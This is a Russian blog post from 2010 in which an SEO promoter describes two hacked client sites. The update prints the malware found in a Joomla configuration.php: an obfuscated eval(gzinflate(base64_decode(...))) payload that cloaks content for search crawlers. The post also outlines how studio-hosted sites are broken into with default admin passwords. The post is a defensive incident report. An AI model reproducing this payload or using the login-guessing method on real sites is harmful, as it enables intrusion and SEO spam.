Loading ...Хакеры не дремлют! 
И каждый день придумывают всё новые и новые способы взлома ваших (и наших…) сайтов. Как я уже когда когда-то упоминал, помимо собственных сайтов я так же занимаюсь продвижением клиентских сайтов, и на днях с клиентскими сайтами произошло пару интересных случаев…
В начале месяца я, как всегда, полез мониторить клиентские позиции и на паре сайтов заметил огромное падение позиций в Гугле. Начал копать… Залез в кеш гугла и на тебе:
При том, что в Яндексе все нормально! А второй сайт, который так же просел в Гугле, имеет совершенно нормальный кеш…
То есть – адреса страниц правильные, реально существующие. Title иногда тот, что нужен, а иногда то же поменянный, наравне с контентом. Контент – не с этого сайта, сайт на русском, коммерческий. Иду на сайт – нет там такого! Иду файлы смотреть – индексы, шаблоны, htaccess – всё то, что и было, ничего не поменяно. Лезу в базу – то же всё как надо. Пишу в саппорт хостинга, отвечают что такого контента в моих файлах нет (а то я не знаю 
), про возможность взлома молчат, советуют обратиться в саппорт Гугла(!)… Поспрашивал на форумах – ни кто не знает куда копать и как от этой заразы избавиться…
Может, кто-то из читателей подскажет решение? Двиг на сайте joomla 1.0.*
И второй случай – вчера закупаюсь ссылками в ГГЛ, ищу сайты из ЯК нужной тематики (для покупки ссылок) и тут на тебе – вылазит сайт, который я продвигаю другому своему клиенту! Сразу же отзваниюсь, говорят – не в курсе, даже не знают что такое биржа… Интересно . Ну, думаю, поломали…
Немного лирики:
Многие студии по созданию сайтов арендуют сервер/vds под размещение сайтов клиентов. После создания сайта он заливается именно туда с дефолтным логином/паролем от админки… Так как, как правило, все такие сайты висят на одном ip, то вычислить, какие там есть сайты не представляет труда… Далее открываем у каждого сайта страницу входа в админку и пробуем дефолтный логин/пароль… Поверьте, далеко не все владельцы сайтов после получения к ним доступа задумываются о смене пароля
В общем, думаю всем понятно как этот сайт «поломали». В итоге, звоню хозяевам сайта, прошу сменить пароль, пишу саппорту ГГЛа:
Здравствуйте!
Я продвигаю сайт http://*****.ru/ и был очень удивлен когда нашел его в вашей бирже, торгующим ссылками. Хозяева об этом ничего не знают (не в курсе, что там ссылки продаются). Завтра я сменю пароль от админки и удалю все ссылки, так что лучше заморозьте деньги на счету продавца.
На что получаю лаконичный ответ:
Администратор
06.07.2010 17:28
Не могли бы вы в доказательства управления сайтом на главной странице разместить в мета-теге слово «Интернет»?
А оно мне надо?? Сегодня снес все проданные изобретательным товарищем ссылки (а напродавать он успел много, штук 40-50), чувствую, не получит он свои денюжки (трехмесячный холд).
В общем, берегите свои сайты, меняйте пароли и не делайте их легкими! Буду благодарен за ответ на вопрос из первой части поста.
Добавлено 12.07.2010:
Спасибо товарищу Crio за подсказку сменить свой юзер агент на Googlebot, в итоге выдалась ошибка:
Error: headers already sent in configuration.php(80) : eval()’d code(1) : eval()’d code(1) : eval()’d code on line 1.
Stopped at line 906 in joomsef.php: HEADERS ALREADY SENT (200)
URL=http://www.*****.ruoption=com_frontpage&Itemid=55:
OPTION=com_frontpage:
Полез в configuration.php а зараза именно там :
Error_Reporting(E_ERROR);
$u=strtolower($_SERVER["HTTP_USER_AGENT"]);
if (strstr($u,»crawler»)or strstr($u,»googlebot»)or strstr($u,»msnbot»)or strstr($u,»yahoo»)or strstr($u,»search»)or strstr($u,»bing»)or strstr($u,»indexer»)or strstr($u,»cuill.com»)or strstr($u,»clushbot»))
{eval(gzinflate(base64_decode(‘FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==’)));};
Потер её, всё заработало!
Постовые: Новости славного города Челябинск – оперативно и интересно!
